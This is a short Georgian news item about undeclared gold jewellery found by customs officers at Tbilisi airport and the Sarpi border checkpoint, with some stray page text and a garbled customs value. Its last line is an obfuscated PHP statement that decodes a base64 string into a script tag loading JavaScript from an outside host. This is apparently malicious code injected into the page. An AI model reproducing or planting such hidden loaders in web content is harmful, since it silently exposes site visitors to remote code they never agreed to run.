celsiusi
ავერსი საქკაბელი

 თბილისის აეროპორტსა და სარფში არადეკლარირებული ოქროს ნაკეთობები გამოვლინდა.

კეროძოდ, ფინანსთა სამინისტროს შემოსავლების სამსახურის ცნობით, 19–21 აგვისტოს, საბაჟო გამშვებ პუნქტებში: ,,თბილისის აეროპორტი“ და ,,სარფი“, მებაჟე ოფიცრებმა ეჭვის საფუძველზე, უცხო ქვეყნის მოქალაქეების როგორც ფიზიკური, ასევე კუთვნილი ბარგის/ხელბარგის დეტალური დათვალიერების შედეგად, დიდი ოდენობით არადეკლარირებული ოქროს (საერთო წონა: 653,2 გრამი) საიუველირო ნაკეთობები გამოვლინეს. არადეკლარირებული საქონლის საერთო საბაჟო ღირებულებამ ჯამში 135 296 95 ლარი შეადგინა.

მათივე ინფორმაციით, კანონდამრღვევი მოქალაქეების საქმის მასალები შემდგომი რეაგირების მიზნით, ფინანსთა სამინისტროს საგამოძიებო სამსახურს გადაეცა.

127
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");